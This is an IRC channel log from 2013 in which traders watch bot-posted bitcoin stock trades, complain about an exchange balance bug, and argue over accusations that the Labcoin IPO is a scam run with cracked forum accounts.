[BTCTC] [ACTIVEMINING] 25 @ 0.0045 = 0.1125 BTC [+] Jul 31 23:27:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.03699 = 0.185 BTC [+] Jul 31 23:27:37 hollywoodundead, youre talking about something else, many are having the same issue today, including me. Jul 31 23:27:43 ^ Jul 31 23:27:54 I had no balance for three hours Jul 31 23:28:02 frb: thank you that worked for me, unfortunately cant bid now Jul 31 23:28:04 Then I did that and it worked, also it worked for five others Jul 31 23:28:10 huh, is labcoin locked or not? Jul 31 23:28:15 Rawted: no problem :) Jul 31 23:28:16 but my btc was tied up for hours Jul 31 23:28:16 [BTCTC] [S.MPOE-PT] 3 @ 0.0009398 = 0.0028 BTC [+] Jul 31 23:28:17 worked for me too, thanks frb Jul 31 23:28:24 It's amazing how quick people here rush to call you an idiot Jul 31 23:28:32 I am offering internal transfer of 7 BTC on btct in exchange for mere 10 BTC, anyone? Jul 31 23:28:39 hahaha thats pretty funny Jul 31 23:28:45 [BTCTC] [ACTIVEMINING] 20 @ 0.004777 = 0.0955 BTC [+] Jul 31 23:28:46 [BTCTC] [ASICMINER-PT] 1 @ 3.762 BTC [-] Jul 31 23:28:56 Time to place bids for ASICMINER :) Jul 31 23:29:02 so trying to withdraw an amount while your balance shows 0 actually refreshes your balance to what it should actually be Jul 31 23:29:24 all this wait for nothing and missed bidding oh well Jul 31 23:29:25 yup ystarnaud_! Jul 31 23:29:38 yeah i guess ill grab another couple asicminer and maybe some cognitive Jul 31 23:29:38 [BTCTC] [TAT.MINIGAME] 10000 @ 0.0002001 = 2.001 BTC [-] Jul 31 23:29:43 Just more proof burnside did it on purpose Jul 31 23:29:50 It was there all along, he just manipulated it gone Jul 31 23:29:53 What a shock Jul 31 23:30:06 Must have forgotten about withdrawals Jul 31 23:30:08 [BTCTC] [ACTIVEMINING] 200 @ 0.0048 = 0.96 BTC [+] Jul 31 23:30:09 [BTCTC] [ASICMINER-PT] 1 @ 3.894 BTC [+] Jul 31 23:30:33 i dont think he is the type to do anything malicious Jul 31 23:30:40 its just a bad coincidence, imo. Jul 31 23:30:52 I don't think so, I think it was to create more bidders once the IPO closed Jul 31 23:31:03 all's possible in love and bitcoins. Jul 31 23:31:12 But it's just a theory with circumstantial evidence :) Jul 31 23:31:21 The fact that the withdraws worked though solidifies it in my mind, think what you'd like Jul 31 23:31:24 [BTCTC] [ACTIVEMINING] 80 @ 0.0048 = 0.384 BTC [+] Jul 31 23:31:25 [BTCTC] [ASICMINER-PT] 1 @ 3.895 BTC [+] Jul 31 23:31:30 Rawted, where do you trade love??? Jul 31 23:31:31 [BTCTC] [TAT.MINIGAME] 115 @ 0.0002001 = 0.023 BTC [-] Jul 31 23:31:53 ThickAsThieves well, now ppl are getting their accounts show up Jul 31 23:32:03 if u do a small withdrawal Jul 31 23:32:06 later all. Jul 31 23:32:09 but too late :( Jul 31 23:32:13 [BTCTC] [ACTIVEMINING] 20 @ 0.004828 = 0.0966 BTC [+] Jul 31 23:32:25 Sorry Jul 31 23:32:28 next drama on btct: people realize there is a withdrawal limit **** BEGIN LOGGING AT Thu Aug 1 05:44:00 2013 Aug 01 05:44:41 [BTCTC] [ACTIVEMINING] 25 @ 0.005305 = 0.1326 BTC [-] Aug 01 05:45:27 http://trilema.com/2013/the-anatomy-of-a-scam/#comment-94208 Aug 01 05:45:31 The anatomy of a scam. pe Trilema - Un blog de Mircea Popescu. Aug 01 05:45:31 more in the mpoe-pr is me. Aug 01 05:45:53 wat Aug 01 05:46:26 [BTCTC] [CRYPTO-TRADE] 2 @ 0.1989 = 0.3978 BTC [+] Aug 01 05:47:19 !ticker m ^oix Aug 01 05:47:20 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Aug 01 05:47:32 mircea_popescu: what's up with OIX? Aug 01 05:47:44 is there really no long options? Aug 01 05:47:52 [HAVELOCK] [HIM] 2 @ 0.141 = 0.282 BTC [-] Aug 01 05:48:14 [HAVELOCK] [HIM] 10 @ 0.138 = 1.38 BTC [-] Aug 01 05:48:22 [HAVELOCK] [HIM] 10 @ 0.135 = 1.35 BTC [-] Aug 01 05:48:44 [HAVELOCK] [HIM] 6 @ 0.1300101 = 0.7801 BTC [-] Aug 01 05:48:54 [HAVELOCK] [HIM] 20 @ 0.13001001 = 2.6002 BTC [-] Aug 01 05:48:55 thestringpuller yep Aug 01 05:48:58 very thin trade. Aug 01 05:49:02 [HAVELOCK] [HIM] 98 @ 0.13 = 12.74 BTC [-] Aug 01 05:49:19 [BTCTC] [LABCOIN] 100 @ 0.0037 = 0.37 BTC [-] Aug 01 05:49:24 ;;ticker Aug 01 05:49:24 MtGox BTCUSD ticker | Best bid: 106.00011, Best ask: 106.48700, Bid-ask spread: 0.48689, Last trade: 106.00009, 24 hour volume: 43312.43338311, 24 hour low: 103.55000, 24 hour high: 111.65202, 24 hour vwap: 108.07822 Aug 01 05:49:32 miercea_popescu: you post my name on your blog?? Aug 01 05:49:35 [BTCTC] [LABCOIN] 60 @ 0.0037 = 0.222 BTC [-] Aug 01 05:49:39 pizza_deliveri what's your name ? Aug 01 05:49:39 [BTCTC] [LABCOIN] 500 @ 0.0037 = 1.85 BTC [-] Aug 01 05:49:44 dvdrewritable Aug 01 05:49:51 [BTCTC] [LABCOIN] 640 @ 0.0037 = 2.368 BTC [-] Aug 01 05:49:53 [BTCTC] [LABCOIN] 1 @ 0.003501 BTC [-] Aug 01 05:49:55 [BTCTC] [LABCOIN] 1718 @ 0.0035 = 6.013 BTC [-] Aug 01 05:49:59 [BTCTC] [LABCOIN] 2070 @ 0.0038 = 7.866 BTC [+] Aug 01 05:50:01 [BTCTC] [LABCOIN] 500 @ 0.0038 = 1.9 BTC [+] Aug 01 05:50:13 how do we know it's "your" name ? Aug 01 05:50:18 [BTCTC] [LABCOIN] 100 @ 0.0037 = 0.37 BTC [-] Aug 01 05:50:20 [BTCTC] [LABCOIN] 50 @ 0.0037 = 0.185 BTC [-] Aug 01 05:50:26 [BTCTC] [LABCOIN] 149 @ 0.0037 = 0.5513 BTC [-] Aug 01 05:50:30 why wouldn't it be? Aug 01 05:50:49 [BTCTC] [LABCOIN] 1 @ 0.00351 BTC [-] Aug 01 05:50:52 [BTCTC] [LABCOIN] 641 @ 0.0035 = 2.2435 BTC [-] Aug 01 05:50:54 [BTCTC] [ASICMINER-PT] 2 @ 4.115 = 8.23 BTC [+] Aug 01 05:50:56 [BTCTC] [LABCOIN] 792 @ 0.0035 = 2.772 BTC [-] Aug 01 05:51:15 [BTCTC] [LABCOIN] 1400 @ 0.0035 = 4.9 BTC [-] Aug 01 05:51:19 [BTCTC] [LABCOIN] 1001 @ 0.0037 = 3.7037 BTC [+] Aug 01 05:51:58 [BTCTC] [LABCOIN] 170 @ 0.003699 = 0.6288 BTC [-] Aug 01 05:52:13 [BTCTC] [LABCOIN] 1 @ 0.0035 BTC [-] Aug 01 05:52:21 [BTCTC] [LABCOIN] 100 @ 0.0035 = 0.35 BTC [-] Aug 01 05:52:34 [BTCTC] [LABCOIN] 1 @ 0.003301 BTC [-] Aug 01 05:52:50 [BTCTC] [LABCOIN] 500 @ 0.003499 = 1.7495 BTC [+] Aug 01 05:52:52 [BTCTC] [LABCOIN] 900 @ 0.0035 = 3.15 BTC [+] Aug 01 05:52:53 right. Aug 01 05:53:12 of ppl were smart, they wold stop trying ot low-flip labcoin and reset their asks much higher Aug 01 05:53:17 for the crazy investors Aug 01 05:53:28 mircea_popescu: can't tell if sarcastic Aug 01 05:53:37 [BTCTC] [LABCOIN] 200 @ 0.0037 = 0.74 BTC [+] Aug 01 05:53:38 [BTCTC] [LTC-ATF.B2] 25 @ 0.01042 = 0.2605 BTC [+] Aug 01 05:53:40 [BTCTC] [ASICMINER-PT] 1 @ 4.115 BTC [+] Aug 01 05:53:45 [BTCTC] [LABCOIN] 200 @ 0.0035 = 0.7 BTC [-] Aug 01 05:53:47 [BTCTC] [LABCOIN] 1 @ 0.003699 BTC [+] Aug 01 05:53:49 [BTCTC] [ASICMINER-PT] 1 @ 4.114 BTC [-] Aug 01 05:53:52 [BTCTC] [ASICMINER-PT] 1 @ 4.112 BTC [-] Aug 01 05:54:02 [BTCTC] [LABCOIN] 100 @ 0.0035 = 0.35 BTC [-] Aug 01 05:54:03 [BTCTC] [LABCOIN] 350 @ 0.0033 = 1.155 BTC [-] Aug 01 05:54:22 [BTCTC] [LABCOIN] 1011 @ 0.0033 = 3.3363 BTC [-] Aug 01 05:54:25 Ukyo that's the sort of smart that got nefario out. Aug 01 05:54:25 anyone know the url to the webbased bitmessage? Aug 01 05:54:26 [BTCTC] [LABCOIN] 500 @ 0.003699 = 1.8495 BTC [+] Aug 01 05:54:37 [BTCTC] [LABCOIN] 10 @ 0.003501 = 0.035 BTC [-] Aug 01 05:54:39 [BTCTC] [LABCOIN] 15 @ 0.0034 = 0.051 BTC [-] Aug 01 05:54:42 mircea_popescu: lol Aug 01 05:54:53 [BTCTC] [TAT.MINIGAME] 449 @ 0.00028 = 0.1257 BTC [-] Aug 01 05:54:55 [BTCTC] [ACTIVEMINING] 5 @ 0.005399 = 0.027 BTC [+] Aug 01 05:54:56 [BTCTC] [TAT.MINIGAME] 2051 @ 0.00027 = 0.5538 BTC [-] Aug 01 05:55:11 though, if labcoin does give results Aug 01 05:55:14 withina good timeframe Aug 01 05:55:16 no. if people were smart they'd stop pushing scams and educate noobs instead. Aug 01 05:55:16 its worth much more Aug 01 05:55:18 than current price Aug 01 05:55:32 Ukyo dude. look at the forum astroturf. that thing isn't anything but a continuation of bfl. Aug 01 05:55:36 [BTCTC] [LABCOIN] 500 @ 0.0035 = 1.75 BTC [+] Aug 01 05:55:39 [BTCTC] [LABCOIN] 785 @ 0.0034 = 2.669 BTC [-] Aug 01 05:55:51 no legitimate company makes a billion posts with new socks and hacked abandoned accounts. Aug 01 05:55:52 i did say if :P Aug 01 05:55:53 [BTCTC] [LABCOIN] 15 @ 0.0034 = 0.051 BTC [-] Aug 01 05:55:55 [BTCTC] [TAT.ASICMINER] 3 @ 0.04188 = 0.1256 BTC [+] Aug 01 05:56:01 well there's ifs and then there's ifs. Aug 01 05:56:01 this wasnt my asset, so I didnt do due dilligence on it Aug 01 05:56:17 Ukyo i didn't care either till yest, when the girl showed me how they covered her post in 10 minutes Aug 01 05:56:22 [BTCTC] [ASICMINER-PT] 2 @ 4.113 = 8.226 BTC [+] Aug 01 05:56:26 i agree, it's a pro scam team, but still a scam team. Aug 01 05:56:35 mircea_popescu: so could you take my name off that list pls? Aug 01 05:56:36 [BTCTC] [TAT.ASICMINER] 16 @ 0.04188 = 0.6701 BTC [+] Aug 01 05:56:37 [BTCTC] [LABCOIN] 15 @ 0.0033 = 0.0495 BTC [-] Aug 01 05:56:40 so conibase has as new login? Aug 01 05:56:43 [BTCTC] [LABCOIN] 15 @ 0.0034 = 0.051 BTC [+] Aug 01 05:56:47 scared the hell out of me Aug 01 05:56:49 [BTCTC] [LABCOIN] 385 @ 0.0034 = 1.309 BTC [+] Aug 01 05:56:52 thought i logged into a hacked site Aug 01 05:57:02 pizza_deliveri how do we know it's "your" name ? Aug 01 05:57:08 [BTCTC] [LABCOIN] 500 @ 0.0034 = 1.7 BTC [+] Aug 01 05:57:08 chsados, frog.li? Aug 01 05:57:13 look at my last post, i will edit it Aug 01 05:57:14 laque_ yeah, always a bad idea to change like that Aug 01 05:57:14 I like how we've reverted to basic websites as the new modern standard Aug 01 05:57:16 well, i'm no puppet :p Aug 01 05:57:19 ppl go "omg phishing" Aug 01 05:57:28 pizza_deliveri the contention is that you bought a cracked forum account,. Aug 01 05:57:33 [BTCTC] [LABCOIN] 115 @ 0.0034 = 0.391 BTC [+] Aug 01 05:57:47 if you did that changing posts is about as indicative as farting in general directions. Aug 01 05:58:02 mircea_popescu: cracked account lol Aug 01 05:58:07 [BTCTC] [ACTIVEMINING] 40 @ 0.006336 = 0.2534 BTC [+] Aug 01 05:58:08 [BTCTC] [LABCOIN] 220 @ 0.0034 = 0.748 BTC [+] Aug 01 05:58:18 pizza_deliveri yes. we keep lists of which accounts are cracked and when. Aug 01 05:58:29 mircea_popescu: it's a false positive Aug 01 05:58:35 [BTCTC] [LABCOIN] 280 @ 0.0034 = 0.952 BTC [+] Aug 01 05:58:37 [BTCTC] [LABCOIN] 128 @ 0.0034 = 0.4352 BTC [+] Aug 01 05:58:39 [BTCTC] [LABCOIN] 990 @ 0.00345 = 3.4155 BTC [+] Aug 01 05:58:41 [BTCTC] [LABCOIN] 500 @ 0.003489 = 1.7445 BTC [+] Aug 01 05:58:43 because if you weren't you'd say so. Aug 01 05:58:43 [BTCTC] [LABCOIN] 1355 @ 0.0035 = 4.7425 BTC [+] Aug 01 05:58:44 [BTCTC] [LABCOIN] 3977 @ 0.0035 = 13.9195 BTC [+] Aug 01 05:58:45 [BTCTC] [LABCOIN] 722 @ 0.0036 = 2.5992 BTC [+] Aug 01 05:58:49 [BTCTC] [LABCOIN] 5000 @ 0.003669 = 18.345 BTC [+] Aug 01 05:58:58 and back up we goooo Aug 01 05:59:00 [BTCTC] [LABCOIN] 500 @ 0.00367 = 1.835 BTC [+] Aug 01 05:59:00 sorry hon. that account is shot. make another and get on with your life. Aug 01 05:59:00 mircea__popescu: what proof do you want? Aug 01 05:59:03 [BTCTC] [LABCOIN] 4906 @ 0.00369 = 18.1031 BTC [+] Aug 01 05:59:05 [BTCTC] [LABCOIN] 2000 @ 0.003696 = 7.392 BTC [+] Aug 01 05:59:07 [BTCTC] [LABCOIN] 499 @ 0.003699 = 1.8458 BTC [+] Aug 01 05:59:08 cue crazty investor pump Aug 01 05:59:11 [BTCTC] [LABCOIN] 25 @ 0.0037 = 0.0925 BTC [+] Aug 01 05:59:13 mircea_popescu: what is wrong with you? Aug 01 05:59:15 how and when do you consider an account as hacked? when previous owner announces his lost? Aug 01 05:59:24 I heard other guys say you are a little bit cuckoo Aug 01 05:59:26 [BTCTC] [LABCOIN] 25 @ 0.0037 = 0.0925 BTC [+] Aug 01 05:59:30 pizza_deliveri http://trilema.com/2013/preemptive-strike-to-have-on-hand-for-when-butterfly-labs-gets-hauled-off-to-jail-in-corpore/ Aug 01 05:59:32 what was the ipo price again? Aug 01 05:59:36 read the last paragraph, for it speaks to you. Aug 01 05:59:36 .001 Aug 01 05:59:48 hehe okey Aug 01 05:59:50 crazy Aug 01 05:59:51 [BTCTC] [LABCOIN] 124 @ 0.0033 = 0.4092 BTC [-] Aug 01 05:59:55 [BTCTC] [LABCOIN] 240 @ 0.0033 = 0.792 BTC [-] Aug 01 05:59:58 [BTCTC] [LABCOIN] 1000 @ 0.0032 = 3.2 BTC [-] Aug 01 06:00:00 agreed Aug 01 06:00:02 [BTCTC] [LABCOIN] 641 @ 0.003111 = 1.9942 BTC [-] Aug 01 06:00:03 mircea_popescu: if you do your homework you can see labcoin asking guys to sell their avalon on ebay Aug 01 06:00:06 pizza_deliveri and it speaks to those "others", too. Aug 01 06:00:15 so labcoin worth over 3 million now? Aug 01 06:00:19 [BTCTC] [LABCOIN] 75 @ 0.003111 = 0.2333 BTC [-] Aug 01 06:00:20 yes yes, i know, you're the kings of ebay. Aug 01 06:00:24 .... Aug 01 06:00:29 [BTCTC] [LABCOIN] 1689 @ 0.003111 = 5.2545 BTC [-] Aug 01 06:00:32 like about 5000 other self employed douches the world over. allow me to fall over in amazement. Aug 01 06:00:35 are you crazy or what? Aug 01 06:00:46 no, i'm just the bane of scammers. Aug 01 06:00:50 [BTCTC] [LABCOIN] 2000 @ 0.00311 = 6.22 BTC [-] Aug 01 06:01:09 lmao Aug 01 06:01:18 a hah! VanCleef is being honest finally! Aug 01 06:01:18 :P Aug 01 06:01:22 ;;auth afrotec Aug 01 06:01:22 Request successful for user afrotec, hostmask afrotec!~afrotec@145.sub-70-194-132.myvzw.com. Your challenge string is: freenode:#bitcoin-otc:7c6ff225203256a97040b871809523e3fd09c49ab161bdf8fc6f7297 Aug 01 06:01:26 [BTCTC] [LABCOIN] 20 @ 0.0031 = 0.062 BTC [-] Aug 01 06:01:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Aug 01 06:01:30 [BTCTC] [LABCOIN] 10 @ 0.0035 = 0.035 BTC [+] Aug 01 06:01:33 which reminds me Aug 01 06:01:33 [BTCTC] [LABCOIN] 1270 @ 0.00331 = 4.2037 BTC [-] Aug 01 06:01:36 [BTCTC] [LABCOIN] 1815 @ 0.00305 = 5.5358 BTC [-] Aug 01 06:01:37 ;;rated tradefortress Aug 01 06:01:38 You have not yet rated user tradefortress Aug 01 06:01:42 [BTCTC] [LABCOIN] 333 @ 0.00305 = 1.0157 BTC [-] Aug 01 06:01:43 ;;eauth mircea_popescu Aug 01 06:01:44 Request successful for user mircea_popescu, hostmask mircea_popescu!~Mircea@pdpc/supporter/silver/mircea-popescu. Get your encrypted OTP from http://bitcoin-otc.com/otps/8A736F0E2FB7B452 Aug 01 06:01:45 every time we get some upward movement, the record locking error rains on the parade Aug 01 06:01:45 [BTCTC] [LABCOIN] 1 @ 0.003001 BTC [-] Aug 01 06:01:47 [BTCTC] [LABCOIN] 782 @ 0.003 = 2.346 BTC [-] Aug 01 06:01:55 mircea_popescu: why don't you check this out http://www.reddit.com/user/g0tavalon Aug 01 06:02:17 ;;everify freenode:#bitcoin-otc:5bb5419737311b08efa9ae20cd1ebb33ca4e581943402fdf3a528624 Aug 01 06:02:19 You are now authenticated for user mircea_popescu with key 8A736F0E2FB7B452 Aug 01 06:02:30 how can we kill this 2-factor proposal like an ill fated bill? Aug 01 06:02:40 [BTCTC] [LABCOIN] 12 @ 0.0033 = 0.0396 BTC [+] Aug 01 06:02:45 ;;rate tradefortress 1 he be rootin dat box yo Aug 01 06:02:47 Rating entry successful. Your rating of 1 for user tradefortress has been recorded. Aug 01 06:02:47 who do you think that is mircea_popescu Aug 01 06:02:56 this is ridiculous, people really want to implement 2-factor servers as part of the PROTOCOL, this is absurd Aug 01 06:03:09 [BTCTC] [BASIC-MINING] 6 @ 0.4014 = 2.4084 BTC [-] Aug 01 06:03:10 [BTCTC] [ASICMINER-PT] 1 @ 4.189 BTC [+] Aug 01 06:03:11 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [-] Aug 01 06:03:13 thestringpuller little hope of that, seeing how tptb really want it, Aug 01 06:03:16 [BTCTC] [ASICMINER-PT] 5 @ 4.19 = 20.95 BTC [+] Aug 01 06:03:19 [BTCTC] [ASICMINER-PT] 1 @ 4.19 BTC [+] Aug 01 06:03:22 [BTCTC] [ASICMINER-PT] 1 @ 4.192 BTC [+] Aug 01 06:03:24 [BTCTC] [ASICMINER-PT] 1 @ 4.193 BTC [+] Aug 01 06:03:26 and with weak assholes like gavin what tbtp want tptb get Aug 01 06:03:27 [BTCTC] [ASICMINER-PT] 1 @ 4.196 BTC [+] Aug 01 06:03:29 [BTCTC] [ASICMINER-PT] 5 @ 4.197 = 20.985 BTC [+] Aug 01 06:03:31 [BTCTC] [ASICMINER-PT] 5 @ 4.198 = 20.99 BTC [+] Aug 01 06:03:37 almost 1M shares volume above the 7M of the IPO... Aug 01 06:03:40 wow Aug 01 06:03:45 [BTCTC] [LABCOIN] 100 @ 0.00311 = 0.311 BTC [-] Aug 01 06:03:46 this isn't good though at all Aug 01 06:03:48 [HAVELOCK] [SDSTM] 5 @ 0.008889 = 0.0444 BTC [-] Aug 01 06:03:55 myeah. Aug 01 06:03:59 mircea_popescu: cat got your tongue?? Aug 01 06:04:02 [BTCTC] [LABCOIN] 200 @ 0.0031 = 0.62 BTC [-] Aug 01 06:04:03 [HAVELOCK] [SDSTM] 2 @ 0.00889 = 0.0178 BTC [+] Aug 01 06:04:06 [BTCTC] [LABCOIN] 1000 @ 0.003001 = 3.001 BTC [-] Aug 01 06:04:07 [BTCTC] [LABCOIN] 2218 @ 0.003 = 6.654 BTC [-] Aug 01 06:04:09 [BTCTC] [LABCOIN] 800 @ 0.003 = 2.4 BTC [-] Aug 01 06:04:19 [BTCTC] [LABCOIN] 1 @ 0.003 BTC [-] Aug 01 06:04:37 [HAVELOCK] [SDSTM] 4 @ 0.0089 = 0.0356 BTC [+] Aug 01 06:04:43 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [-] Aug 01 06:04:46 bitcoin will go the way of paypal, because if the govt. wants to seize a server, it becomes just like dns... Aug 01 06:05:03 [BTCTC] [LABCOIN] 1 @ 0.002959 BTC [-] Aug 01 06:05:19 [HAVELOCK] [SMG] 5 @ 0.00025999 = 0.0013 BTC [-] Aug 01 06:05:39 [BTCTC] [LABCOIN] 2000 @ 0.003 = 6 BTC [+] Aug 01 06:05:41 so when is the btcgarden ipo Aug 01 06:05:45 [BTCTC] [LABCOIN] 1000 @ 0.003 = 3 BTC [+] Aug 01 06:05:47 [HAVELOCK] [SMG] 5 @ 0.0002599 = 0.0013 BTC [-] Aug 01 06:05:50 [BTCTC] [LABCOIN] 1 @ 0.00296 BTC [-] Aug 01 06:05:52 im interested to see what failure can become of that one too Aug 01 06:05:53 [HAVELOCK] [SMG] 2000 @ 0.00025 = 0.5 BTC [-] Aug 01 06:06:00 [BTCTC] [LABCOIN] 99 @ 0.00296 = 0.293 BTC [-] Aug 01 06:06:01 [HAVELOCK] [SMG] 15 @ 0.00025 = 0.0038 BTC [-] Aug 01 06:06:04 [HAVELOCK] [SMG] 4985 @ 0.00025 = 1.2463 BTC [-] Aug 01 06:06:17 [BTCTC] [DMS.MINING] 1 @ 0.007699 BTC [+] Aug 01 06:06:26 mircea_popescu: you say that you don't have to upgrade Aug 01 06:06:30 [BTCTC] [TAT.ASICMINER] 9 @ 0.041 = 0.369 BTC [-] Aug 01 06:06:31 thestringpuller nah, not really. we'll just continue to use the real btc, let the scammer-government binomial play with the fake btc till they're blue in the face. Aug 01 06:06:41 will that cause a fork? Aug 01 06:06:42 [BTCTC] [LABCOIN] 100 @ 0.00291 = 0.291 BTC [-] Aug 01 06:06:43 sure. Aug 01 06:06:46 [BTCTC] [RSM] 15 @ 0.01618 = 0.2427 BTC [+] Aug 01 06:06:57 mircea_popescu: ?? why my username still present on your site? Aug 01 06:06:58 at some point it will cause a fork. Aug 01 06:07:03 hmm Aug 01 06:07:04 [BTCTC] [LABCOIN] 200 @ 0.00291 = 0.582 BTC [-] Aug 01 06:07:10 [BTCTC] [LABCOIN] 161 @ 0.00291 = 0.4685 BTC [-] Aug 01 06:07:12 pizza_deliveri dude, i'm done with you for now. if you're needed again i'll say. Aug 01 06:07:17 [BTCTC] [LABCOIN] 30 @ 0.00291 = 0.0873 BTC [-] Aug 01 06:07:18 weirdo Aug 01 06:07:23 [BTCTC] [LABCOIN] 392 @ 0.00291 = 1.1407 BTC [-] Aug 01 06:07:39 i hear the labcoin has forked already thats why its going down... Aug 01 06:07:40 [BTCTC] [LABCOIN] 117 @ 0.00291 = 0.3405 BTC [-] Aug 01 06:07:44 why are retards developing bitcoin? Aug 01 06:07:57 mircea_popescu: you and your alter egos need some proffessional help Aug 01 06:08:33 I wondered why other guys called you a strange man Aug 01 06:08:38 now is very clear Aug 01 06:09:32 [BTCTC] [LABCOIN] 50 @ 0.0028 = 0.14 BTC [-] Aug 01 06:09:37 [BTCTC] [ACTIVEMINING] 1 @ 0.005351 BTC [-] Aug 01 06:09:43 [BTCTC] [LABCOIN] 58 @ 0.0027 = 0.1566 BTC [-] Aug 01 06:09:45 [BTCTC] [ACTIVEMINING] 25 @ 0.006337 = 0.1584 BTC [+] Aug 01 06:09:46 [BTCTC] [LABCOIN] 1018 @ 0.002621 = 2.6682 BTC [-] Aug 01 06:09:47 [BTCTC] [ACTIVEMINING] 50 @ 0.006338 = 0.3169 BTC [+] Aug 01 06:09:48 [BTCTC] [ACTIVEMINING] 6 @ 0.00634 = 0.038 BTC [+] Aug 01 06:09:49 [BTCTC] [LABCOIN] 1300 @ 0.002602 = 3.3826 BTC [-] Aug 01 06:09:51 [BTCTC] [ACTIVEMINING] 12 @ 0.006381 = 0.0766 BTC [+] Aug 01 06:09:52 [BTCTC] [LABCOIN] 4000 @ 0.002601 = 10.404 BTC [-] Aug 01 06:09:53 [BTCTC] [ACTIVEMINING] 25 @ 0.006382 = 0.1596 BTC [+] Aug 01 06:09:55 [BTCTC] [LABCOIN] 8000 @ 0.0026 = 20.8 BTC [-] Aug 01 06:09:56 [BTCTC] [ACTIVEMINING] 10 @ 0.006438 = 0.0644 BTC [+] Aug 01 06:09:57 [BTCTC] [LABCOIN] 700 @ 0.00257 = 1.799 BTC [-] Aug 01 06:09:58 [BTCTC] [ACTIVEMINING] 184 @ 0.006441 = 1.1851 BTC [+] Aug 01 06:09:58 micrcea_popescu: you haven't even done your research properly, I've got more evidence against labcoin than you presented in that junk post Aug 01 06:09:59 [BTCTC] [ACTIVEMINING] 1000 @ 0.0065 = 6.5 BTC [+] Aug 01 06:10:00 [BTCTC] [LABCOIN] 283 @ 0.002521 = 0.7134 BTC [-] Aug 01 06:10:00 [BTCTC] [ACTIVEMINING] 25 @ 0.006969 = 0.1742 BTC [+] Aug 01 06:10:01 [BTCTC] [LABCOIN] 300 @ 0.00252 = 0.756 BTC [-] Aug 01 06:10:03 [BTCTC] [ACTIVEMINING] 800 @ 0.006969 = 5.5752 BTC [+] Aug 01 06:10:04 [BTCTC] [LABCOIN] 100 @ 0.002512 = 0.2512 BTC [-] Aug 01 06:10:05 [BTCTC] [ACTIVEMINING] 44 @ 0.00697 = 0.3067 BTC [+] Aug 01 06:10:07 [BTCTC] [LABCOIN] 140 @ 0.002511 = 0.3515 BTC [-] Aug 01 06:10:08 [BTCTC] [ACTIVEMINING] 333 @ 0.00697 = 2.321 BTC [+] Aug 01 06:10:08 the buyback begins? Aug 01 06:10:26 that's an interesting pattern there assbot Aug 01 06:10:26 lotsa extra dosh in folks accounts too Aug 01 06:10:29 [BTCTC] [LABCOIN] 4051 @ 0.002511 = 10.1721 BTC [-] Aug 01 06:10:39 [BTCTC] [LABCOIN] 175 @ 0.00291 = 0.5093 BTC [+] Aug 01 06:10:43 [HAVELOCK] [AM100] 1 @ 0.0393 BTC [-] Aug 01 06:10:45 [BTCTC] [LABCOIN] 50 @ 0.002512 = 0.1256 BTC [-] Aug 01 06:10:48 [HAVELOCK] [AM100] 11 @ 0.03911 = 0.4302 BTC [-] Aug 01 06:10:49 pizza_deliveri so go publish it. Aug 01 06:11:01 When I sell off Aug 01 06:11:03 ask side is thin now, rebound soon Aug 01 06:11:05 [HAVELOCK] [AM100] 1 @ 0.039 BTC [-] Aug 01 06:11:15 [BTCTC] [LABCOIN] 1000 @ 0.002603 = 2.603 BTC [+] Aug 01 06:11:17 [BTCTC] [LABCOIN] 900 @ 0.00258 = 2.322 BTC [-] Aug 01 06:11:19 mircea_popescu: and why don't you go and check out knc Aug 01 06:11:19 [BTCTC] [LABCOIN] 400 @ 0.00258 = 1.032 BTC [-] Aug 01 06:11:21 [BTCTC] [LABCOIN] 100 @ 0.002515 = 0.2515 BTC [-] Aug 01 06:11:23 [BTCTC] [LABCOIN] 1450 @ 0.002512 = 3.6424 BTC [-] Aug 01 06:11:25 [BTCTC] [LABCOIN] 1000 @ 0.002512 = 2.512 BTC [-] Aug 01 06:11:26 [HAVELOCK] [AM100] 20 @ 0.039 = 0.78 BTC [-] Aug 01 06:11:28 [BTCTC] [LABCOIN] 449 @ 0.002511 = 1.1274 BTC [-] Aug 01 06:11:29 how you havent noticed that :) Aug 01 06:11:30 [BTCTC] [LABCOIN] 20 @ 0.002511 = 0.0502 BTC [-] Aug 01 06:11:32 [BTCTC] [LABCOIN] 19681 @ 0.00251 = 49.3993 BTC [-] Aug 01 06:11:37 [BTCTC] [ACTIVEMINING] 190 @ 0.005352 = 1.0169 BTC [-] Aug 01 06:11:50 [BTCTC] [LABCOIN] 1000 @ 0.00258 = 2.58 BTC [+] Aug 01 06:12:01 pizza_deliveri wait, what. you know shit that's going to mysteriously have to wait and there's other examples of scams just as poorly made ? Aug 01 06:12:02 [HAVELOCK] [SMG] 15 @ 0.00025 = 0.0038 BTC [-] Aug 01 06:12:18 i don't go after your scam because it's pooere than the others. i go after it because you're good at what you do and quite brazen Aug 01 06:12:25 [BTCTC] [LABCOIN] 80 @ 0.00291 = 0.2328 BTC [+] Aug 01 06:12:33 !ticker btctc tat.virtualmine Aug 01 06:12:35 [BTCT:TAT.VIRTUALMINE] 1D: 0.00212 / 0.00262 / 0.002937 (2647 shares, 6.9 BTC), 7D: 0.002 / 0.00291 / 0.003448 (26566 shares, 77.4 BTC), 30D: 0.002 / 0.00377 / 0.0049 (142649 shares, 538.1 BTC) Aug 01 06:12:39 [BTCTC] [LABCOIN] 5 @ 0.0029 = 0.0145 BTC [-] Aug 01 06:12:48 !last btctc tat.virtualmine Aug 01 06:12:49 Last trade for TAT.VIRTUALMINE on BTCTC was at 0.00275 BTC [+] Aug 01 06:12:50 mircea_popescu: hahah my scam? omg.. im here to cash out only Aug 01 06:12:52 [BTCTC] [LABCOIN] 20 @ 0.0029 = 0.058 BTC [-] Aug 01 06:12:55 [BTCTC] [LABCOIN] 77 @ 0.00291 = 0.2241 BTC [+] Aug 01 06:13:00 [BTCTC] [LABCOIN] 451 @ 0.00291 = 1.3124 BTC [+] Aug 01 06:13:02 that'd be the definition of it. Aug 01 06:13:02 [BTCTC] [LABCOIN] 1 @ 0.002978 BTC [+] Aug 01 06:13:04 [BTCTC] [LABCOIN] 1500 @ 0.002998 = 4.497 BTC [+] Aug 01 06:13:06 [BTCTC] [LABCOIN] 600 @ 0.002999 = 1.7994 BTC [+] Aug 01 06:13:08 lololol Aug 01 06:13:09 